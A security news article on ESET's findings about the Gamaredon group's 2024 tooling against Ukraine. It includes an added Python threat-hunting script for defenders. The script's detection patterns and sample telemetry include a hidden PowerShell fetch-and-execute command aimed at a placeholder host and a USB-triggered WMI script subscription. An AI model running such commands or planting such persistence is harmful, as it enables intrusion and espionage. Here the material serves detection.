Gamaredon Unleashes Six New Malware Tools for Stealth, Persistence, and Lateral Movement
Gamaredon, a Russia-aligned advanced persistent threat (APT) group attributed by Ukraine’s Security Service (SSU) to the FSB’s 18th Center of Information Security, has exclusively targeted Ukrainian governmental institutions throughout 2024, abandoning prior attempts to hit NATO countries.
According to an ESET Research report (ESET has closely tracked the group's activities), this refocus aligns with Gamaredon's long-standing cyberespionage objectives amid the ongoing Russia-Ukraine conflict.
Exclusive Focus on Ukraine Intensifies in 2024
The group’s operations have surged in intensity, with spearphishing campaigns growing in scale and frequency, particularly in the second half of the year.
These campaigns, often spanning one to five days, leverage malicious archives (RAR, ZIP, 7z) and XHTML files using HTML smuggling techniques to deliver HTA or LNK files that execute VBScript downloaders.
Notably, October 2024 saw Gamaredon experiment with malicious hyperlinks and innovative LNK files executing PowerShell commands via Cloudflare-hosted domains, bypassing traditional detection mechanisms.
Gamaredon’s technical arsenal in 2024 reflects a blend of innovation and refinement, introducing six new malware tools primarily built on PowerShell and VBScript, emphasizing stealth, persistence, and lateral movement.
Among these, PteroTickle, discovered in March, targets Python applications for lateral spread, while PteroGraphin, identified in August, uses encrypted channels via the Telegraph API for payload delivery.
Innovative Toolset Evolution
PteroBox, a November find, mirrors earlier tools but exfiltrates data to Dropbox with meticulous tracking to avoid redundant uploads.
Simultaneously, existing tools like PteroPSDoor and PteroLNK received significant upgrades, incorporating advanced obfuscation, registry-based storage, and WMI event subscriptions for stealthier file exfiltration and USB detection.
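The two behaviours described above, script hosts launched from user-writable paths with a download capability (the archive/HTML-smuggling chain) and WMI event subscriptions keyed to removable-drive insertion (the PteroLNK-style USB detection), are easy to express as hunting heuristics over process-creation and WMI-subscription telemetry. The following Python is an added example written for this page, not code from ESET or from the article; the event field names and all sample events are constructed for illustration and do not come from any product or from the report.

```python
"""Hunting heuristics for the delivery chain and WMI persistence described above.

Added example: the ProcessEvent / WmiSubscription field names and every sample
event are constructed for illustration, not taken from a real product or report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Script interpreters the report's chain ends in (HTA/LNK -> VBScript / PowerShell).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
# Paths an unprivileged user (or an archive viewer) can write to.
USER_WRITABLE = ("\\temp\\", "\\downloads\\", "\\appdata\\")
DOWNLOAD_RE = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|msxml2\.(server)?xmlhttp",
    re.IGNORECASE,
)
SCRIPT_EXT_RE = re.compile(r"\.(hta|vbs|vbe|lnk|js|ps1)\b", re.IGNORECASE)
# WQL fragments that fire on removable-drive arrival (DriveType 2 = removable).
USB_QUERY_RE = re.compile(r"win32_volumechangeevent|drivetype\s*=\s*2", re.IGNORECASE)
# WMI consumer classes that run a script or a command line when the filter fires.
SCRIPT_CONSUMERS = {"activescripteventconsumer", "commandlineeventconsumer"}


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


@dataclass
class WmiSubscription:
    consumer_type: str  # WMI consumer class bound by the subscription
    query: str          # WQL filter query bound to that consumer


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process(ev: ProcessEvent) -> list[str]:
    """Return the reasons a process-creation event resembles the script-downloader chain."""
    reasons: list[str] = []
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return reasons
    cmd = ev.command_line.lower()
    if SCRIPT_EXT_RE.search(cmd) and any(hint in cmd for hint in USER_WRITABLE):
        reasons.append("script host runs a script from a user-writable path")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("command line carries a URL or download primitive")
    if _basename(ev.parent_image) in {"explorer.exe", "winrar.exe", "7zfm.exe", "7zg.exe"}:
        reasons.append("launched from the shell or an archive viewer (user opened a file)")
    return reasons


def is_suspicious_process(ev: ProcessEvent) -> bool:
    # Any single reason is common in benign use; two together match the chain.
    return len(score_process(ev)) >= 2


def score_wmi(sub: WmiSubscription) -> list[str]:
    """Return the reasons a WMI subscription looks like a USB-triggered script hook."""
    reasons: list[str] = []
    if sub.consumer_type.lower() in SCRIPT_CONSUMERS:
        reasons.append("consumer executes a script or command line")
    if USB_QUERY_RE.search(sub.query):
        reasons.append("filter fires on removable-drive insertion")
    return reasons


def hunt(processes: list[ProcessEvent], subscriptions: list[WmiSubscription]) -> list[str]:
    """Collect one finding line per suspicious event."""
    findings = []
    for ev in processes:
        if is_suspicious_process(ev):
            findings.append(f"process {ev.command_line!r}: " + "; ".join(score_process(ev)))
    for sub in subscriptions:
        reasons = score_wmi(sub)
        if len(reasons) == 2:
            findings.append(f"wmi {sub.consumer_type}: " + "; ".join(reasons))
    return findings


# Constructed sample telemetry (not real observations).
SAMPLE_PROCESSES = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 r'mshta.exe "C:\Users\user\Downloads\zvit.hta"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
                 r'powershell.exe -w hidden -c "iwr https://c2.example.invalid/p | iex"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
                 r'powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Tool\maint.ps1"'),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe notes.txt"),
]
SAMPLE_WMI = [
    WmiSubscription("ActiveScriptEventConsumer",
                    "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA "
                    "'Win32_LogicalDisk' AND TargetInstance.DriveType = 2"),
    WmiSubscription("NTEventLogEventConsumer",
                    "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_Service'"),
]

if __name__ == "__main__":
    for line in hunt(SAMPLE_PROCESSES, SAMPLE_WMI):
        print(line)
```

The scoring deliberately requires two independent signals before flagging a process, because each one alone (a PowerShell script in Downloads, a URL on a command line, a child of explorer.exe) is routine on an administrator's workstation; the WMI check, by contrast, treats a script-executing consumer bound to a removable-drive filter as sufficient on its own, since that pairing has almost no legitimate use.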
A peculiar payload in July, lacking espionage functions, instead opened a pro-Russian Telegram channel, hinting at Gamaredon’s occasional foray into propaganda dissemination.
On the infrastructure front, the group has almost entirely concealed its command-and-control (C&C) setup behind Cloudflare tunnels, cutting its use of conventional domains from over 500 in 2023 to around 200, while exploiting third-party services like Telegram, Codeberg, and DNS-over-HTTPS (DoH) resolvers to evade network defenses.
Techniques such as fast-flux DNS, though scaled back, and novel execution of embedded scripts in temporary directories further complicate automated detection, showcasing Gamaredon’s persistent adaptability.
This relentless evolution, coupled with aggressive targeting of Ukraine, positions Gamaredon as a formidable cyberespionage threat.
As long as geopolitical tensions persist, ESET anticipates the group will continue refining its tactics, tools, and evasion strategies to sustain its operations against Ukrainian entities.
The detailed technical breakdown of these developments, as provided in ESET’s latest white paper, underscores the urgent need for robust cybersecurity measures to counter such sophisticated, state-aligned adversaries in an increasingly complex digital threatscape.